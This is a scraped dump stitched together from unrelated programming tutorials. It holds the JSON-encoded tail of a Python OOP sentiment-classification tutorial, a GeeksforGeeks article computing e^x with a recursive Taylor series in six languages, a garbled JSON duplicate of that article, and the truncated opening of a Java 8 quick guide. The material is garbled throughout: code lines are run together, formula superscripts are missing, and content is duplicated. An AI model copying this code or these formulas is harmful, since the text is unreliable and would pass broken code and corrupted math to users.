to use. (There will of course be several other algorithms), however, this class architecture will allow us to do the following:" }, { "code": null, "e": 2726, "s": 2508, "text": "(1) Divide data into train and test sets, (2) Preprocess and vectorize data into TF-IDF tokens, (3) train the model, (4) compute accuracy and related metrics on test set performance, and (5) save the model via pickle." }, { "code": null, "e": 3290, "s": 2726, "text": "This pipeline will greatly increase your efficiency. I, like many others, jumped into ~data science material before having a solid handle on the fundamentals. I’d scroll up and down through notebooks looking for the right variables I had defined earlier. And if I wanted to compare the performance of 2 or 3 models, it would become a nightmare, making sure I referenced the appropriate variable names. You’ll see that with the following approach, comparing model performance will be a trivial task and (with any luck,) I’ll have made an OOP evangelist out of you!" 
}, { "code": null, "e": 3332, "s": 3290, "text": "For display issues, see this GitHub Gist." }, { "code": null, "e": 3499, "s": 3332, "text": "As you’ll note above, I’ve defined two classes: DataSplitter and Classifier. For starters, let’s just look at DataSplitter; we’ll visit Classifier shortly thereafter." }, { "code": null, "e": 4083, "s": 3499, "text": "DataSplitter receives a dataframe, the name of the text column and the name of the sentiment column. Then train_test_split is used to assign the class following attributes: x_train, x_test, y_train, and y_test. Note that the random_state and test_percent parameters have default values. What this means is — unless you specifically change either of these parameters, two class instances will have identical x_train, x_test, y_train, and y_test attributes. This will be useful as we can compare ML models directly without worry that they were trained on (slightly) different datasets." }, { "code": null, "e": 4174, "s": 4083, "text": "When a DataSplitter class object is instantiated, you can access these values very simply:" }, { "code": null, "e": 4446, "s": 4174, "text": "import pandas as pddata = pd.read_csv('yelp_samples_500k.csv')d = data.sample(n=1000)ds = DataSplitter(data=d,x_var='text',y_var='sentiment')ds.x_test>>>267157 This place always has a line so I expected to ...197388 Would give them a zero stars if I could. They ..." }, { "code": null, "e": 4580, "s": 4446, "text": "As you can see, the self keyword binds these attributes to the object. Using dot notation, it’s trivial to retrieve these attributes." }, { "code": null, "e": 5316, "s": 4580, "text": "On to our next OOP concept: Inheritance! For this example we’ll move onto the second class, Classifier. Inheritance simply means one class inheriting functionality from a previously defined class. In our case, Classifier will inherit all the functionality of DataSplitter; note two things: (1) DataSplitter receives no class to inherit from in its definition DataSplitter() whereas Classifier(DataSplitter) does receive a class to inherit from. (2) The super keyword is used in Classifier’s __init__ method. This has the effect of executing DataSplitter’s init method then moving on to all other instructions specific to Classifier’s own init method. Bottom line, we train/test/split our data without retyping all that code over again!" }, { "code": null, "e": 5668, "s": 5316, "text": "After the init method, you’ll see __vectorize . Note the double underscores preceding the definition. This is how encapsulation is achieved in python. Encapsulation means ~the object has access attributes and methods that are not available to the programmer. In other words, they’re abstracted away (or encapsulated) as to not distract the programmer." }, { "code": null, "e": 5900, "s": 5668, "text": "from sklearn.naive_bayes import MultinomialNBnb = MultinomialNB()c = Classifier(data=d,model_instance=nb,x_var='text',y_var='sentiment')c.__vectorize('some text')>>>AttributeError: 'Classifier' object has no attribute '__vectorize'" }, { "code": null, "e": 5976, "s": 5900, "text": "In other words, the object has access to these methods, however, we do not!" }, { "code": null, "e": 6368, "s": 5976, "text": "Speaking of methods, if you hadn’t guessed — methods are simply functions built into a class object. The methods we’ve defined above include __vectorize, __fit, __evaluate_accuracy, metrics, predict, and save. 
Starting with vectorize, we use NLTK’s word_tokenize function to tokenize all words and punctuation into unigrams. Next, we use NLTK’s ngrams function to create bigrams and trigrams" }, { "code": null, "e": 6476, "s": 6368, "text": "'I like dogs' #text['I', 'like', 'dogs'] #unigrams['I like', 'like dogs'] #bigrams['I like dogs'] #trigram " }, { "code": null, "e": 7861, "s": 6476, "text": "This method improves upon unigrams greatly because it allows for ML models to learn the difference between “good” and “not good,” for example. Note that I’ve not removed stopwords or punctuation and haven’t stemmed word tokens either. This might be a good homework assignment if you’re interested in expanding functionality! The __vectorize method is delivered to the pipeline attribute, which is created by the __fit method. Likewise, the __fit method trains the ML model supplied to the init method and creates predictions (preds.) The following method __evaluate_accuracy determines the binary accuracy of the model and assigns as a class attribute for ease of access later (no need to recompute multiple times.) Next, our metrics method will either retrieve binary accuracy for us or print the classification report (precision, recall, etc.) Our predict methods productionizes this code with simplicity. Supply text to the method call and either a class will be assigned or the probability of belonging to class 1 will be returned. (If you’re interested in multiclass classification, some adjustments will be necessary — I’ll leave that to you as a homework problem!) Lastly, the save method receives a file-path and pickles the entire object. This is neat — all we have to do is open the pickled file to access all class methods and attributes, including the fully trained model!" }, { "code": null, "e": 8065, "s": 7861, "text": "from sklearn.naive_bayes import MultinomialNBnb = MultinomialNB()nb_model = Classifier(data=data,model_instance=nb,x_var='text',y_var='sentiment')nb_model.metrics()>>>'92.77733333333333 percent accurate'" }, { "code": null, "e": 8117, "s": 8065, "text": "Let’s compare this to the random forest classifier!" }, { "code": null, "e": 8336, "s": 8117, "text": "from sklearn.ensemble import RandomForestClassifierrf = RandomForestClassifier()rf_model = Classifier(data=data,model_instance=rf,x_var='text',y_var='sentiment')rf_model.metrics()>>>'86.29666666666667 percent accurate'" }, { "code": null, "e": 8486, "s": 8336, "text": "It appears that our naive bayes model outperforms our random forest classifier. Saving our object (and opening it again for later use) is as easy as:" }, { "code": null, "e": 8770, "s": 8486, "text": "## savingnb_model.save('nb_model') #will append .pkl to end of input## opening for later usewith open('nb_model.pkl','rb') as f: loaded_model = pickle.load(f)loaded_model.predict(\"This tutorial was super awesome!\",prob=True)>>>0.943261472480177 # 94% certain of positive sentiment" }, { "code": null, "e": 9132, "s": 8770, "text": "I hope you’ve enjoyed this tutorial; my goals were — concise, informative, and practical. To meet all three objectives, some OOP topics didn’t make the cut (polymorphism, for example.) Please comment if you found this helpful. Likewise, if you’d like me to explore similar concepts, post a comment and I’ll see if it’s something I can work into future articles." } ]
Program to Calculate e^x by Recursion ( using Taylor Series ) - GeeksforGeeks
16 Sep, 2021

The value of the Exponential function can be calculated using the Taylor Series.

e^x = 1 + x/1! + x^2/2! + x^3/3! + ...... (up to n terms)

As the number of terms increases, a more precise value of e^x is obtained.

To find e^x using a recursive function, we need to use static variables. A function can return only one value, and when we need to carry multiple values across calls of a recursive function, we use static variables. The Taylor Series is a combination of multiple values (a running sum, a power and a factorial term), hence we will use static variables.

For the power of x we will use p, and for the factorial we will use f as static variables.

The following statement is used to increase the power of x.

p = p*x

The following statement is used to compute the factorial.

f = f*n

The following expression is used to calculate the summation of the series.

r+p/f

Where r is the recursive call to the function.

Below is the implementation of the above idea.

C++ C Java Python3 C# Javascript

// C++ implementation of the approach
#include <iostream>
using namespace std;

// Recursive Function with static
// variables p and f
double e(int x, int n)
{
    static double p = 1, f = 1;
    double r;

    // Termination condition
    if (n == 0)
        return 1;

    // Recursive call
    r = e(x, n - 1);

    // Update the power of x
    p = p * x;

    // Factorial
    f = f * n;

    return (r + p / f);
}

// Driver code
int main()
{
    int x = 4, n = 15;
    cout << "\n" << e(x, n);
    return 0;
}

// this code is contributed by shivanisinghss2110

// C implementation of the approach
#include <stdio.h>

// Recursive Function with static
// variables p and f
double e(int x, int n)
{
    static double p = 1, f = 1;
    double r;

    // Termination condition
    if (n == 0)
        return 1;

    // Recursive call
    r = e(x, n - 1);

    // Update the power of x
    p = p * x;

    // Factorial
    f = f * n;

    return (r + p / f);
}

// Driver code
int main()
{
    int x = 4, n = 15;
    printf("%lf \n", e(x, n));
    return 0;
}

// Java implementation of the approach
import java.text.*;

class GFG {

    // Recursive Function with static
    // variables p and f
    static double p = 1, f = 1;

    static double e(int x, int n)
    {
        double r;

        // Termination condition
        if (n == 0)
            return 1;

        // Recursive call
        r = e(x, n - 1);

        // Update the power of x
        p = p * x;

        // Factorial
        f = f * n;

        return (r + p / f);
    }

    // Driver code
    public static void main(String[] args)
    {
        int x = 4, n = 15;
        DecimalFormat df = new DecimalFormat("0.######");
        System.out.println(df.format(e(x, n)));
    }
}

// This code is contributed by mits

# Python implementation of the approach

# Recursive Function
# global variables p and f
p = 1.0
f = 1.0

def e(x, n):
    global p, f

    # Termination condition
    if (n == 0):
        return 1

    # Recursive call
    r = e(x, n - 1)

    # Update the power of x
    p = p * x

    # Factorial
    f = f * n

    return (r + p / f)

# Driver code
x = 4
n = 15
print(e(x, n))

# This contributed by ihritik

// C# implementation of the approach
using System;

class GFG {

    // Recursive Function with static
    // variables p and f
    static double p = 1, f = 1;

    static double e(int x, int n)
    {
        double r;

        // Termination condition
        if (n == 0)
            return 1;

        // Recursive call
        r = e(x, n - 1);

        // Update the power of x
        p = p * x;

        // Factorial
        f = f * n;

        return (r + p / f);
    }

    // Driver code
    static void Main()
    {
        int x = 4, n = 15;
        Console.WriteLine(Math.Round(e(x, n), 6));
    }
}

// This code is contributed by mits

<script>

// Javascript implementation of the approach

// Recursive Function with static
// variables p and f
p = 1, f = 1;
function e(x, n)
{
    var r;

    // Termination condition
    if (n == 0)
        return 1;

    // Recursive call
    r = e(x, n - 1);

    // Update the power of x
    p = p * x;

    // Factorial
    f = f * n;

    return (r + p / f);
}

// Driver Code
var x = 4, n = 15;
var res = e(x, n);

document.write(res.toFixed(6));

// This code is contributed by kirti

</script>

54.597883

Time Complexity: To find this, we will determine the total number of multiplications performed.

e^x = 1 + x/1! + x^2/2! + x^3/3! + ...... (up to n terms)
    = 1 + x/1 + x*x/1*2 + x*x*x/1*2*3 + x*x*x*x/1*2*3*4 + ...... (up to n terms)

The number of multiplications needed for the successive terms above is 0, 0, 2, 4, 8, and so on. So, for n terms, the total number of multiplications performed is comparable to the sum of the first n natural numbers (as a parallel series of even numbers is formed), and we know that the sum of the first n natural numbers is n*(n+1)/2, whose order is n^2. Hence, the time complexity of this approach is O(n^2).

Auxiliary Space: The recursive call will take place n+1 times and hence n+1 activation records will get created at most. That shows the space complexity is O(n).
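As a quick sanity check (not part of the original article), the 15-term sum above can be compared against the math library's exponential: the value 54.597883 printed by the programs is the Taylor approximation of e^4.

import math

def taylor_e(x, n):
    # Accumulate the same series iteratively: each term is the previous
    # term multiplied by x/i, i.e. x**i / i!
    total, term = 1.0, 1.0
    for i in range(1, n + 1):
        term = term * x / i
        total += term
    return total

print(f"{taylor_e(4, 15):.6f}")   # 54.597883 (Taylor approximation, as above)
print(f"{math.exp(4):.6f}")       # 54.598150 (math library value of e^4)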
[ { "code": null, "e": 24614, "s": 24586, "text": "\n16 Sep, 2021" }, { "code": null, "e": 24692, "s": 24614, "text": "The value of the Exponential function can be calculated using Taylor Series. " }, { "code": null, "e": 24741, "s": 24692, "text": " = 1 + x/1! + /2! + /3! + ...... + until n terms" }, { "code": null, "e": 24816, "s": 24741, "text": "As the number of terms increases the more precise value of ex is obtained." }, { "code": null, "e": 25149, "s": 24816, "text": "To find e^x using the recursive function, we need to use static variables. A function can return only one value, and when we need to include multiple values in a recursive function, we use static variables. The Taylor Series is a combination of multiple values like sum, power and factorial term, hence we will use static variables." }, { "code": null, "e": 25240, "s": 25149, "text": "For the power of x, we will use p, and for factorials, we will use f as static variables. " }, { "code": null, "e": 25303, "s": 25240, "text": "The function shown below is used to increase the power of x. " }, { "code": null, "e": 25312, "s": 25303, "text": "p = p*x " }, { "code": null, "e": 25360, "s": 25312, "text": "The function below is used to find factorials. " }, { "code": null, "e": 25368, "s": 25360, "text": "f = f*n" }, { "code": null, "e": 25438, "s": 25368, "text": "The function below is used to calculate the summation of the series. " }, { "code": null, "e": 25444, "s": 25438, "text": "r+p/f" }, { "code": null, "e": 25491, "s": 25444, "text": "Where r is the recursive call to the function." }, { "code": null, "e": 25540, "s": 25491, "text": "Below is the implementation of the above idea. " }, { "code": null, "e": 25544, "s": 25540, "text": "C++" }, { "code": null, "e": 25546, "s": 25544, "text": "C" }, { "code": null, "e": 25551, "s": 25546, "text": "Java" }, { "code": null, "e": 25559, "s": 25551, "text": "Python3" }, { "code": null, "e": 25562, "s": 25559, "text": "C#" }, { "code": null, "e": 25573, "s": 25562, "text": "Javascript" }, { "code": "// C++ implementation of the approach#include <iostream>using namespace std; // Recursive Function with static// variables p and fdouble e(int x, int n){ static double p = 1, f = 1; double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f);} // Driver codeint main(){ int x = 4, n = 15; cout<<\"\\n\"<< e(x, n); return 0;} // this code is contributed by shivanisinghss2110", "e": 26111, "s": 25573, "text": null }, { "code": "// C implementation of the approach#include <stdio.h> // Recursive Function with static// variables p and fdouble e(int x, int n){ static double p = 1, f = 1; double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f);} // Driver codeint main(){ int x = 4, n = 15; printf(\"%lf \\n\", e(x, n)); return 0;}", "e": 26581, "s": 26111, "text": null }, { "code": "// Java implementation of the approachimport java.text.*; class GFG { // Recursive Function with static // variables p and f static double p = 1, f = 1; static double e(int x, int n) { double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f); } // Driver code public static void main(String[] args) { int x = 4, n = 15; DecimalFormat df = new DecimalFormat(\"0.######\"); 
System.out.println(df.format(e(x, n))); }} // This code is contributed by mits", "e": 27283, "s": 26581, "text": null }, { "code": "# Python implementation of the approach # Recursive Function# global variables p and fp = 1.0f = 1.0 def e(x, n): global p, f # Termination condition if (n == 0): return 1 # Recursive call r = e(x, n - 1) # Update the power of x p = p * x # Factorial f = f * n return (r + p / f) # Driver code x = 4n = 15print(e(x, n)) # This contributed by ihritik", "e": 27678, "s": 27283, "text": null }, { "code": "// C# implementation of the approachusing System; class GFG { // Recursive Function with static // variables p and f static double p = 1, f = 1; static double e(int x, int n) { double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f); } // Driver code static void Main() { int x = 4, n = 15; Console.WriteLine(Math.Round(e(x, n), 6)); }} // This code is contributed by mits", "e": 28298, "s": 27678, "text": null }, { "code": "<script> // Javascript implementation of the approach // Recursive Function with static// variables p and fp = 1, f = 1;function e(x, n){ var r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f);} // Driver Codevar x = 4, n = 15;var res = e(x, n); document.write(res.toFixed(6)); // This code is contributed by kirti </script>", "e": 28778, "s": 28298, "text": null }, { "code": null, "e": 28788, "s": 28778, "text": "54.597883" }, { "code": null, "e": 28808, "s": 28790, "text": "Time Complexity: " }, { "code": null, "e": 28875, "s": 28808, "text": "To find this we will determine the total multiplication performed." }, { "code": null, "e": 28933, "s": 28875, "text": "e^x = 1 + x/1! + x^2/2! + x^3/3! + ...... + until n terms" }, { "code": null, "e": 29016, "s": 28933, "text": " = 1 + x/1 + x*x/1*2 + x*x*x/1*2*3 + x*x*x*x/1*2*3*4 ...... + until n terms" }, { "code": null, "e": 29150, "s": 29016, "text": " 0 0 2 4 8 Number of Multiplications in above terms" }, { "code": null, "e": 29289, "s": 29150, "text": "So, for n terms total multiplication performed is comparable to sum of n natural numbers (as a parallel series of even numbers is formed)." }, { "code": null, "e": 29356, "s": 29289, "text": "and we know sum of n natural numbers = n*(n+1)/2 whose order is n2" }, { "code": null, "e": 29409, "s": 29356, "text": "Hence, the time complexity if this approach is O(n2)" }, { "code": null, "e": 29427, "s": 29409, "text": "Auxiliary Space: " }, { "code": null, "e": 29573, "s": 29427, "text": "The recursive call will take place n+1 times and hence n + 1 activation records will get created at max. That shows the space complexity is O(n)." 
}, { "code": null, "e": 29586, "s": 29573, "text": "Mithun Kumar" }, { "code": null, "e": 29594, "s": 29586, "text": "ihritik" }, { "code": null, "e": 29607, "s": 29594, "text": "Kirti_Mangal" }, { "code": null, "e": 29623, "s": 29607, "text": "pankajsharmagfg" }, { "code": null, "e": 29633, "s": 29623, "text": "amoghpete" }, { "code": null, "e": 29648, "s": 29633, "text": "sagartomar9927" }, { "code": null, "e": 29667, "s": 29648, "text": "shivanisinghss2110" }, { "code": null, "e": 29674, "s": 29667, "text": "series" }, { "code": null, "e": 29685, "s": 29674, "text": "Algorithms" }, { "code": null, "e": 29698, "s": 29685, "text": "Mathematical" }, { "code": null, "e": 29708, "s": 29698, "text": "Recursion" }, { "code": null, "e": 29721, "s": 29708, "text": "Mathematical" }, { "code": null, "e": 29731, "s": 29721, "text": "Recursion" }, { "code": null, "e": 29738, "s": 29731, "text": "series" }, { "code": null, "e": 29749, "s": 29738, "text": "Algorithms" }, { "code": null, "e": 29847, "s": 29749, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 29856, "s": 29847, "text": "Comments" }, { "code": null, "e": 29869, "s": 29856, "text": "Old Comments" }, { "code": null, "e": 29918, "s": 29869, "text": "SDE SHEET - A Complete Guide for SDE Preparation" }, { "code": null, "e": 29943, "s": 29918, "text": "DSA Sheet by Love Babbar" }, { "code": null, "e": 29970, "s": 29943, "text": "Introduction to Algorithms" }, { "code": null, "e": 30031, "s": 29970, "text": "Converting Roman Numerals to Decimal lying between 1 to 3999" }, { "code": null, "e": 30065, "s": 30031, "text": "K means Clustering - Introduction" }, { "code": null, "e": 30095, "s": 30065, "text": "Program for Fibonacci numbers" }, { "code": null, "e": 30110, "s": 30095, "text": "C++ Data Types" }, { "code": null, "e": 30170, "s": 30110, "text": "Write a program to print all permutations of a given string" }, { "code": null, "e": 30213, "s": 30170, "text": "Set in C++ Standard Template Library (STL)" } ]
Command to show the database currently being used in MongoDB?
The command to show the database currently used in MongoDB is the following −

db;

Let us first check how many databases are present. The query is as follows −

> show dbs;

The following is the output displaying all the databases −

admin          0.000GB
config         0.000GB
local          0.000GB
sample         0.000GB
sampleDemo     0.000GB
studentSearch  0.000GB
test           0.003GB

Now we have the list of all databases. Let us use the above syntax to check the current database. The query is as follows −

> db;

The following is the output −

sample

As the above sample output shows, we are currently using the ‘sample’ database. Let us switch the database and verify the correctness of the db command again. The query to switch the database is as follows −

> use test;

The following is the output −

switched to db test

As the above sample output shows, we have changed the database from ‘sample’ to ‘test’. Now let us once again check the current database name. The query is as follows −

> db;

The following is the output −

test

You can also use the getName() function. The query is as follows −

> db.getName();

The following is the output −

test

You can use the current command to check the current working database. The query is as follows −

> db.current;

The following is the output −

test.current
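The same check can also be made from application code. As an aside (not part of the original tutorial), here is a small PyMongo sketch that lists the databases and reports which database object is currently in use; the connection string is a placeholder for a local MongoDB instance.

from pymongo import MongoClient

# Placeholder connection string for a local MongoDB server
client = MongoClient("mongodb://localhost:27017/")

# Equivalent of "show dbs;" in the mongo shell
print(client.list_database_names())

# Pick a database; its name plays the role of "db;" / db.getName()
db = client["test"]
print(db.name)   # -> 'test'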
[ { "code": null, "e": 1140, "s": 1062, "text": "The command to show the database currently used in MongoDB is the following −" }, { "code": null, "e": 1144, "s": 1140, "text": "db;" }, { "code": null, "e": 1221, "s": 1144, "text": "Let us first check how many databases are present. The query is as follows −" }, { "code": null, "e": 1233, "s": 1221, "text": "> show dbs;" }, { "code": null, "e": 1292, "s": 1233, "text": "The following is the output displaying all the databases −" }, { "code": null, "e": 1404, "s": 1292, "text": "admin 0.000GB\nconfig 0.000GB\nlocal 0.000GB\nsample 0.000GB\nsampleDemo 0.000GB\nstudentSearch 0.000GB\ntest 0.003GB" }, { "code": null, "e": 1525, "s": 1404, "text": "Now, we have the list of all databases. Let us use the above syntax to check current database. The query is as follows −" }, { "code": null, "e": 1531, "s": 1525, "text": "> db;" }, { "code": null, "e": 1561, "s": 1531, "text": "The following is the output −" }, { "code": null, "e": 1568, "s": 1561, "text": "sample" }, { "code": null, "e": 1718, "s": 1568, "text": "Look at the above sample output, we are currently using ‘sample’ database. Let us switch the database and verify again the correctness of command db." }, { "code": null, "e": 1762, "s": 1718, "text": "The query is as follows to switch database." }, { "code": null, "e": 1774, "s": 1762, "text": "> use test;" }, { "code": null, "e": 1804, "s": 1774, "text": "The following is the output −" }, { "code": null, "e": 1825, "s": 1804, "text": "switched to db test\n" }, { "code": null, "e": 1912, "s": 1825, "text": "Look at the above sample output, we have changed the database from ‘sample’ to ‘test’." }, { "code": null, "e": 1993, "s": 1912, "text": "Now let us once again check the current database name. The query is as follows −" }, { "code": null, "e": 1999, "s": 1993, "text": "> db;" }, { "code": null, "e": 2029, "s": 1999, "text": "The following is the output −" }, { "code": null, "e": 2034, "s": 2029, "text": "test" }, { "code": null, "e": 2088, "s": 2034, "text": "Use the function getName(). The query is as follows −" }, { "code": null, "e": 2104, "s": 2088, "text": "> db.getName();" }, { "code": null, "e": 2134, "s": 2104, "text": "The following is the output −" }, { "code": null, "e": 2140, "s": 2134, "text": "test\n" }, { "code": null, "e": 2212, "s": 2140, "text": "You can use the current command to check the current working database −" }, { "code": null, "e": 2238, "s": 2212, "text": "The query is as follows −" }, { "code": null, "e": 2252, "s": 2238, "text": "> db.current;" }, { "code": null, "e": 2282, "s": 2252, "text": "The following is the output −" }, { "code": null, "e": 2295, "s": 2282, "text": "test.current" } ]
Java 8 - Quick Guide
JAVA 8 is a major feature release of JAVA programming language development. Its initial version was released on 18 March 2014. With the Java 8 release, Java provided supports for functional programming, new JavaScript engine, new APIs for date time manipulation, new streaming API, etc. Lambda expression − Adds functional processing capability to Java. Lambda expression − Adds functional processing capability to Java. Method references − Referencing functions by their names instead of invoking them directly. Using functions as parameter. Method references − Referencing functions by their names instead of invoking them directly. Using functions as parameter. Default method − Interface to have default method implementation. Default method − Interface to have default method implementation. New tools − New compiler tools and utilities are added like ‘jdeps’ to figure out dependencies. New tools − New compiler tools and utilities are added like ‘jdeps’ to figure out dependencies. Stream API − New stream API to facilitate pipeline processing. Stream API − New stream API to facilitate pipeline processing. Date Time API − Improved date time API. Date Time API − Improved date time API. Optional − Emphasis on best practices to handle null values properly. Optional − Emphasis on best practices to handle null values properly. Nashorn, JavaScript Engine − A Java-based engine to execute JavaScript code. Nashorn, JavaScript Engine − A Java-based engine to execute JavaScript code. Consider the following code snippet. import java.util.Collections; import java.util.List; import java.util.ArrayList; import java.util.Comparator; public class Java8Tester { public static void main(String args[]) { List<String> names1 = new ArrayList<String>(); names1.add("Mahesh "); names1.add("Suresh "); names1.add("Ramesh "); names1.add("Naresh "); names1.add("Kalpesh "); List<String> names2 = new ArrayList<String>(); names2.add("Mahesh "); names2.add("Suresh "); names2.add("Ramesh "); names2.add("Naresh "); names2.add("Kalpesh "); Java8Tester tester = new Java8Tester(); System.out.println("Sort using Java 7 syntax: "); tester.sortUsingJava7(names1); System.out.println(names1); System.out.println("Sort using Java 8 syntax: "); tester.sortUsingJava8(names2); System.out.println(names2); } //sort using java 7 private void sortUsingJava7(List<String> names) { Collections.sort(names, new Comparator<String>() { @Override public int compare(String s1, String s2) { return s1.compareTo(s2); } }); } //sort using java 8 private void sortUsingJava8(List<String> names) { Collections.sort(names, (s1, s2) -> s1.compareTo(s2)); } } Run the program to get the following result. Sort using Java 7 syntax: [ Kalpesh Mahesh Naresh Ramesh Suresh ] Sort using Java 8 syntax: [ Kalpesh Mahesh Naresh Ramesh Suresh ] Here the sortUsingJava8() method uses sort function with a lambda expression as parameter to get the sorting criteria. If you want to set up your own environment for Java programming language, then this section guides you through the whole process. Please follow the steps given below to set up your Java environment. Java SE can be downloaded for free from the following link − https://www.oracle.com/technetwork/java/javase/downloads/index-jsp-138363.html You download a version based on your operating system. Follow the instructions to download Java, and run the .exe to install Java on your machine. Once you have installed Java on your machine, you would need to set environment variables to point to correct installation directories. 
Assuming you have installed Java in c:\Program Files\java\jdk directory − Right-click on 'My Computer' and select 'Properties'. Right-click on 'My Computer' and select 'Properties'. Click on the 'Environment variables' button under the 'Advanced' tab. Click on the 'Environment variables' button under the 'Advanced' tab. Now, alter the 'Path' variable so that it also contains the path to the Java executable. For example, if the path is currently set to 'C:\WINDOWS\SYSTEM32', then change your path to read 'C:\WINDOWS\SYSTEM32;c:\Program Files\java\jdk\bin'. Now, alter the 'Path' variable so that it also contains the path to the Java executable. For example, if the path is currently set to 'C:\WINDOWS\SYSTEM32', then change your path to read 'C:\WINDOWS\SYSTEM32;c:\Program Files\java\jdk\bin'. Assuming you have installed Java in c:\Program Files\java\jdk directory − Edit the 'C:\autoexec.bat' file and add the following line at the end − SET PATH=%PATH%;C:\Program Files\java\jdk\bin Edit the 'C:\autoexec.bat' file and add the following line at the end − SET PATH=%PATH%;C:\Program Files\java\jdk\bin Environment variable PATH should be set to point to where the Java binaries have been installed. Refer to your shell documentation if you have trouble doing this. For example, if you use bash as your shell, then you would add the following line at the end of your '.bashrc: export PATH=/path/to/java:$PATH' To write Java programs, you need a text editor. There are even more sophisticated IDEs available in the market. But for now, you can consider one of the following − Notepad − On Windows machine, you can use any simple text editor like Notepad (recommended for this tutorial) or TextPad. Notepad − On Windows machine, you can use any simple text editor like Notepad (recommended for this tutorial) or TextPad. Netbeans − It is a Java IDE that is open-source and free. It can be downloaded from https://netbeans.org/index.html. Netbeans − It is a Java IDE that is open-source and free. It can be downloaded from https://netbeans.org/index.html. Eclipse − It is also a Java IDE developed by the Eclipse open-source community and can be downloaded from https://www.eclipse.org/. Eclipse − It is also a Java IDE developed by the Eclipse open-source community and can be downloaded from https://www.eclipse.org/. Lambda expressions are introduced in Java 8 and are touted to be the biggest feature of Java 8. Lambda expression facilitates functional programming, and simplifies the development a lot. A lambda expression is characterized by the following syntax. parameter -> expression body Following are the important characteristics of a lambda expression. Optional type declaration − No need to declare the type of a parameter. The compiler can inference the same from the value of the parameter. Optional type declaration − No need to declare the type of a parameter. The compiler can inference the same from the value of the parameter. Optional parenthesis around parameter − No need to declare a single parameter in parenthesis. For multiple parameters, parentheses are required. Optional parenthesis around parameter − No need to declare a single parameter in parenthesis. For multiple parameters, parentheses are required. Optional curly braces − No need to use curly braces in expression body if the body contains a single statement. Optional curly braces − No need to use curly braces in expression body if the body contains a single statement. 
Optional return keyword − The compiler automatically returns the value if the body has a single expression to return the value. Curly braces are required to indicate that expression returns a value. Optional return keyword − The compiler automatically returns the value if the body has a single expression to return the value. Curly braces are required to indicate that expression returns a value. Create the following Java program using any editor of your choice in, say, C:\> JAVA. public class Java8Tester { public static void main(String args[]) { Java8Tester tester = new Java8Tester(); //with type declaration MathOperation addition = (int a, int b) -> a + b; //with out type declaration MathOperation subtraction = (a, b) -> a - b; //with return statement along with curly braces MathOperation multiplication = (int a, int b) -> { return a * b; }; //without return statement and without curly braces MathOperation division = (int a, int b) -> a / b; System.out.println("10 + 5 = " + tester.operate(10, 5, addition)); System.out.println("10 - 5 = " + tester.operate(10, 5, subtraction)); System.out.println("10 x 5 = " + tester.operate(10, 5, multiplication)); System.out.println("10 / 5 = " + tester.operate(10, 5, division)); //without parenthesis GreetingService greetService1 = message -> System.out.println("Hello " + message); //with parenthesis GreetingService greetService2 = (message) -> System.out.println("Hello " + message); greetService1.sayMessage("Mahesh"); greetService2.sayMessage("Suresh"); } interface MathOperation { int operation(int a, int b); } interface GreetingService { void sayMessage(String message); } private int operate(int a, int b, MathOperation mathOperation) { return mathOperation.operation(a, b); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − 10 + 5 = 15 10 - 5 = 5 10 x 5 = 50 10 / 5 = 2 Hello Mahesh Hello Suresh Following are the important points to be considered in the above example. Lambda expressions are used primarily to define inline implementation of a functional interface, i.e., an interface with a single method only. In the above example, we've used various types of lambda expressions to define the operation method of MathOperation interface. Then we have defined the implementation of sayMessage of GreetingService. Lambda expressions are used primarily to define inline implementation of a functional interface, i.e., an interface with a single method only. In the above example, we've used various types of lambda expressions to define the operation method of MathOperation interface. Then we have defined the implementation of sayMessage of GreetingService. Lambda expression eliminates the need of anonymous class and gives a very simple yet powerful functional programming capability to Java. Lambda expression eliminates the need of anonymous class and gives a very simple yet powerful functional programming capability to Java. Using lambda expression, you can refer to any final variable or effectively final variable (which is assigned only once). Lambda expression throws a compilation error, if a variable is assigned a value the second time. Create the following Java program using any editor of your choice in, say, C:\> JAVA. Java8Tester.java public class Java8Tester { final static String salutation = "Hello! 
"; public static void main(String args[]) { GreetingService greetService1 = message -> System.out.println(salutation + message); greetService1.sayMessage("Mahesh"); } interface GreetingService { void sayMessage(String message); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Hello! Mahesh Method references help to point to methods by their names. A method reference is described using "::" symbol. A method reference can be used to point the following types of methods − Static methods Instance methods Constructors using new operator (TreeSet::new) Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.util.List; import java.util.ArrayList; public class Java8Tester { public static void main(String args[]) { List names = new ArrayList(); names.add("Mahesh"); names.add("Suresh"); names.add("Ramesh"); names.add("Naresh"); names.add("Kalpesh"); names.forEach(System.out::println); } } Here we have passed System.out::println method as a static method reference. Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Mahesh Suresh Ramesh Naresh Kalpesh Functional interfaces have a single functionality to exhibit. For example, a Comparable interface with a single method ‘compareTo’ is used for comparison purpose. Java 8 has defined a lot of functional interfaces to be used extensively in lambda expressions. Following is the list of functional interfaces defined in java.util.Function package. BiConsumer<T,U> Represents an operation that accepts two input arguments, and returns no result. BiFunction<T,U,R> Represents a function that accepts two arguments and produces a result. BinaryOperator<T> Represents an operation upon two operands of the same type, producing a result of the same type as the operands. BiPredicate<T,U> Represents a predicate (Boolean-valued function) of two arguments. BooleanSupplier Represents a supplier of Boolean-valued results. Consumer<T> Represents an operation that accepts a single input argument and returns no result. DoubleBinaryOperator Represents an operation upon two double-valued operands and producing a double-valued result. DoubleConsumer Represents an operation that accepts a single double-valued argument and returns no result. DoubleFunction<R> Represents a function that accepts a double-valued argument and produces a result. DoublePredicate Represents a 